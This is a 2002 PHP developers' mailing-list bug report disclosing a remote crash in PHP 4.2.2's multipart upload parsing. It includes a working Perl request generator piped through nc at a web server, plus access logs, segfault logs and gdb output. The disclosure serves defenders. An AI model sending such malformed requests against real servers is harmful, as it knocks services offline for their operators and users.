>---------- Forwarded message ----------
>Date: Wed, 24 Jul 2002 16:12:06 -0400 (EDT)
>From: Dan Kalowsky <[EMAIL PROTECTED]>
>To: [EMAIL PROTECTED]
>Subject: Re: Bug #18547 Updated: Remote attacker can cause SIGSEGV
>
>Please send it to [EMAIL PROTECTED]

(Okay, that's easy enough -- I posted this in the web form, but it
wrapped all to hell. Thanks for the email address, Mr. Kalowsky)

Hello. While working on an exploit for the multipart_buffer_headers() hole
that you just fixed, I found another problem that you might want to
look into. It looks like a DoS only (at the faulting `decw 0xa(%eax)` in the
register dump below, eax is 0, i.e. a write through a null pointer), but there
might be a way to execute arbitrary code and I just haven't found it yet.
Credit for the find goes to myself and members of the [0dd] 0-Day Digest.

Thanks,

Thomas Cannon

---

[root@spoon]# /usr/local/www/bin/apachectl start
/usr/local/www/bin/apachectl start: httpd started
[root@spoon]# telnet 0 80
Trying 0.0.0.0...
Connected to 0.
Escape character is '^]'.
HEAD / HTTP/1.0
HTTP/1.1 200 OK
Date: Wed, 24 Jul 2002 04:03:49 GMT
Server: Apache/1.3.26 (Unix) PHP/4.2.2
X-Powered-By: PHP/4.2.2
Connection: close
Content-Type: text/html
Connection closed by foreign host.
[root@spoon]# /usr/local/www/bin/httpd -l
Compiled-in modules:
http_core.c
mod_env.c
mod_log_config.c
mod_mime.c
mod_negotiation.c
mod_status.c
mod_include.c
mod_autoindex.c
mod_dir.c
mod_cgi.c
mod_asis.c
mod_imap.c
mod_actions.c
mod_userdir.c
mod_alias.c
mod_access.c
mod_auth.c
mod_setenvif.c
mod_php4.c
suexec: disabled; invalid wrapper /usr/local/www/bin/suexec
[root@spoon]#

/* change over to my remote machine, stereophonic */

[tcannon@stereophonic]$ ./header.pl | nc noops.org 80 &
[1] 90464
[tcannon@stereophonic]$ ./header.pl | nc noops.org 80 &
[2] 90466
[tcannon@stereophonic]$ ./header.pl | nc noops.org 80 &
[3] 90468
[tcannon@stereophonic]$ ./header.pl | nc noops.org 80 &
[4] 90470
[tcannon@stereophonic]$ ./header.pl | nc noops.org 80 &

[tcannon@stereophonic]$ more header.pl
#!/usr/bin/perl
# Request generator for the report above: writes one multipart/form-data
# POST to stdout (the shell pipes it into nc).  The declared Content-length
# (246) is larger than the body this script actually emits (the two leading
# newlines, the 13-byte boundary line and the 137-byte partial
# Content-Disposition header, about 152 bytes), so the server keeps waiting
# for the missing bytes -- cf. the gdb stack below, which shows the httpd
# child parked in read() under fill_buffer()/get_line().
headers();
# Prints the request line, headers and the truncated body.  Takes no
# arguments; the return value is not used.
sub headers {
print "POST /vuln/upload.php HTTP/1.0\n";
# The doubled ';' is an empty statement and harmless (it may be an archiving
# artifact -- the same stray ';' after the URL appears in the access-log
# lines further down).
print "Referer: http://www.noops.org\n";;
print "Connection: Keep-Alive\n";
print "User-Agent: killer-loop.pl\n";
print "Host: www.noops.org\n";
# As printed here the literal spans two lines (likely mail wrapping); Perl
# allows an embedded newline in a double-quoted string, so it still compiles,
# but the header then carries a literal line break.
print "Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg,
image/png, */*\n";
print "Accept-Encoding: gzip\n";
print "Accept-Language: en\n";
print "Accept-Charset: iso-8859-1,*,utf-8\n";
print "Content-type: multipart/form-data; boundary=xnyLAaB03X\n";
# "\n\n\n\n": the first newline ends this header line, the second ends the
# header block, and the remaining two are the first bytes of the body.
print "Content-length: 246\n\n\n\n";
print "--xnyLAaB03X\n";
# 'x' binds tighter than '.', so this is "...name=" followed by 100 'A's.
# There is no terminating newline: the part header is never completed and
# no further bytes follow.
print "Content-Disposition: form-data; name="."A" x 100;
}

/* then back to spoon, the webserver... The 'reviewer' script is a little
thing I whipped up to keep a note of where I last read the apache_log and
error_log from; it also weeds out the Code Red and Nimda background
noise -- you'd see this same output from 'tail' or a similar utility */

/* NOTE: 5 - 10 minutes need to pass to give apache time to segfault   */

[root@spoon]# reviewer
noops.org - - [23/Jul/2002:21:03:49 -0700] "HEAD / HTTP/1.0" 200 0 "-" "-"
adsl-66-127-227-196.dsl.sntc01.pacbell.net - - [23/Jul/2002:21:10:15 -0700] "POST /vuln/upload.php HTTP/1.0" 200 - "http://www.noops.org" "killer-loop.pl"
adsl-66-127-227-196.dsl.sntc01.pacbell.net - - [23/Jul/2002:21:10:38 -0700] "POST /vuln/upload.php HTTP/1.0" 200 - "http://www.noops.org" "killer-loop.pl"
adsl-66-127-227-196.dsl.sntc01.pacbell.net - - [23/Jul/2002:21:10:38 -0700] "POST /vuln/upload.php HTTP/1.0" 200 - "http://www.noops.org" "killer-loop.pl"
adsl-66-127-227-196.dsl.sntc01.pacbell.net - - [23/Jul/2002:21:10:39 -0700] "POST /vuln/upload.php HTTP/1.0" 200 - "http://www.noops.org" "killer-loop.pl"
adsl-66-127-227-196.dsl.sntc01.pacbell.net - - [23/Jul/2002:21:10:39 -0700] "POST /vuln/upload.php HTTP/1.0" 200 - "http://www.noops.org" "killer-loop.pl"

Now it's the error log...

[Tue Jul 23 21:03:40 2002] [notice] Apache/1.3.26 (Unix) PHP/4.2.2 configured -- resuming normal operations
[Tue Jul 23 21:03:40 2002] [notice] Accept mutex: flock (Default: flock)
[Tue Jul 23 21:10:15 2002] [notice] child pid 31780 exit signal Segmentation fault (11)
[Tue Jul 23 21:10:38 2002] [notice] child pid 31781 exit signal Segmentation fault (11)
[Tue Jul 23 21:10:39 2002] [notice] child pid 31782 exit signal Segmentation fault (11)
[Tue Jul 23 21:10:39 2002] [notice] child pid 31779 exit signal Segmentation fault (11)
[Tue Jul 23 21:10:40 2002] [notice] child pid 31871 exit signal Segmentation fault (11)

[root@spoon]# gdb /usr/local/www/bin/httpd 32839
GNU gdb 4.18
Copyright 1998 Free Software Foundation, Inc.
GDB is free software, covered by the GNU General Public License, and you
are welcome to change it and/or distribute copies of it under certain
conditions.
Type "show copying" to see the conditions.
There is absolutely no warranty for GDB.  Type "show warranty" for
details.
This GDB was configured as "i386-unknown-freebsd"...
/usr/local/www/conf/32839: No such file or directory.
Attaching to program: /usr/local/www/bin/httpd, process 32839
Reading symbols from /usr/lib/libpam.so.1...done.
Reading symbols from /usr/lib/libcrypt.so.2...done.
Reading symbols from /usr/lib/libm.so.2...done.
Reading symbols from /usr/lib/libc.so.4...done.
Reading symbols from /usr/libexec/ld-elf.so.1...done.
0x28265794 in read () from /usr/lib/libc.so.4
(gdb) info stack
#0  0x28265794 in read () from /usr/lib/libc.so.4
#1  0x812002d in ap_read ()
#2  0x8121c41 in buff_read ()
#3  0x8121be7 in saferead_guts ()
#4  0x812064e in read_with_errors ()
#5  0x812087e in ap_bread ()
#6  0x81335ce in ap_get_client_block ()
#7  0x807a60a in sapi_apache_read_post ()
#8  0x8080576 in fill_buffer (self=0x823a30c) at rfc1867.c:178
#9  0x808072f in get_line (self=0x823a30c) at rfc1867.c:283
#10 0x808095d in multipart_buffer_headers (self=0x823a30c, header=0xbfbff5c4) at rfc1867.c:374
#11 0x8080fb5 in rfc1867_post_handler (content_type_dup=0x82055cc "multipart/form-data; boundary=xnyLAaB03X", arg=0x821f6ac) at rfc1867.c:663
#12 0x807f581 in sapi_handle_post (arg=0x821f6ac) at SAPI.c:110
#13 0x8082339 in php_treat_data (arg=0, str=0x0, destArray=0x0) at php_variables.c:251
#14 0x807d6df in php_hash_environment () at main.c:1149
#15 0x807ce33 in php_request_startup () at main.c:733
#16 0x8105bc2 in apache_php_module_main (r=0x8237034, display_source_mode=0) at sapi_apache.c:67
#17 0x807b02e in send_php ()
#18 0x807b082 in send_parsed_php ()
#19 0x8122665 in ap_invoke_handler ()
#20 0x8137928 in process_request_internal ()
#21 0x8137992 in ap_process_request ()
#22 0x812e487 in child_main ()
#23 0x812e710 in make_child ()
#24 0x812ea94 in perform_idle_server_maintenance ()
#25 0x812f011 in standalone_main ()
#26 0x812f654 in main ()
#27 0x8062e01 in _start ()
(gdb) n
Single stepping until exit from function read,
which has no line number information.
Program received signal SIGTRAP, Trace/breakpoint trap.
0x28265794 in read () from /usr/lib/libc.so.4
(gdb) n
Single stepping until exit from function read,
which has no line number information.
Program received signal SIGTRAP, Trace/breakpoint trap.
0x812b9dc in alrm_handler ()
(gdb) n
Single stepping until exit from function alrm_handler,
which has no line number information.
Program received signal SIGSEGV, Segmentation fault.
0x80f6b8c in _zval_ptr_dtor (zval_ptr=0x81c433c) at zend_execute_API.c:272
272     zend_execute_API.c: No such file or directory.
(gdb) info all-registers
eax            0x0      0
ecx            0x8      8
edx            0x1      1
ebx            0x81c433c        136069948
esp            0xbfbff6b8       0xbfbff6b8
ebp            0xbfbff6d0       0xbfbff6d0
esi            0x81c433c        136069948
edi            0x2      2
eip            0x80f6b8c        0x80f6b8c
eflags         0x10292  66194
cs             0x1f     31
ss             0x2f     47
ds             0x2f     47
es             0x2f     47
fs             0x2f     47
gs             0x2f     47
(gdb) disassemble 0x80f6b8c
Dump of assembler code for function _zval_ptr_dtor:
0x80f6b80 <_zval_ptr_dtor>:     pushl  %ebp
0x80f6b81 <_zval_ptr_dtor+1>:   movl   %esp,%ebp
0x80f6b83 <_zval_ptr_dtor+3>:   subl   $0x14,%esp
0x80f6b86 <_zval_ptr_dtor+6>:   pushl  %ebx
0x80f6b87 <_zval_ptr_dtor+7>:   movl   0x8(%ebp),%ebx
0x80f6b8a <_zval_ptr_dtor+10>:  movl   (%ebx),%eax
0x80f6b8c <_zval_ptr_dtor+12>:  decw   0xa(%eax)
0x80f6b90 <_zval_ptr_dtor+16>:  movl   (%ebx),%eax
0x80f6b92 <_zval_ptr_dtor+18>:  movzwl 0xa(%eax),%edx
0x80f6b96 <_zval_ptr_dtor+22>:  testw  %dx,%dx
0x80f6b99 <_zval_ptr_dtor+25>:  jne    0x80f6bbc <_zval_ptr_dtor+60>
0x80f6b9b <_zval_ptr_dtor+27>:  addl   $0xfffffff4,%esp
0x80f6b9e <_zval_ptr_dtor+30>:  pushl  %eax
0x80f6b9f <_zval_ptr_dtor+31>:  call   0x80fcf88 <_zval_dtor>
0x80f6ba4 <_zval_ptr_dtor+36>:  movl   (%ebx),%eax
0x80f6ba6 <_zval_ptr_dtor+38>:  addl   $0x10,%esp
0x80f6ba9 <_zval_ptr_dtor+41>:  cmpl   0x81c84d0,%eax
0x80f6baf <_zval_ptr_dtor+47>:  je     0x80f6bcc <_zval_ptr_dtor+76>
0x80f6bb1 <_zval_ptr_dtor+49>:  addl   $0xfffffff4,%esp
0x80f6bb4 <_zval_ptr_dtor+52>:  pushl  %eax
0x80f6bb5 <_zval_ptr_dtor+53>:  call   0x80f15d0 <_efree>
0x80f6bba <_zval_ptr_dtor+58>:  jmp    0x80f6bcc <_zval_ptr_dtor+76>
0x80f6bbc <_zval_ptr_dtor+60>:  cmpw   $0x1,%dx
0x80f6bc0 <_zval_ptr_dtor+64>:  jne    0x80f6bcc <_zval_ptr_dtor+76>
0x80f6bc2 <_zval_ptr_dtor+66>:  cmpb   $0x5,0x8(%eax)
0x80f6bc6 <_zval_ptr_dtor+70>:  je     0x80f6bcc <_zval_ptr_dtor+76>
0x80f6bc8 <_zval_ptr_dtor+72>:  movb   $0x0,0x9(%eax)
0x80f6bcc <_zval_ptr_dtor+76>:  movl   0xffffffe8(%ebp),%ebx
0x80f6bcf <_zval_ptr_dtor+79>:  leave
0x80f6bd0 <_zval_ptr_dtor+80>:  ret
End of assembler dump.


-- 
PHP Development Mailing List <http://www.php.net/>
To unsubscribe, visit: http://www.php.net/unsub.php
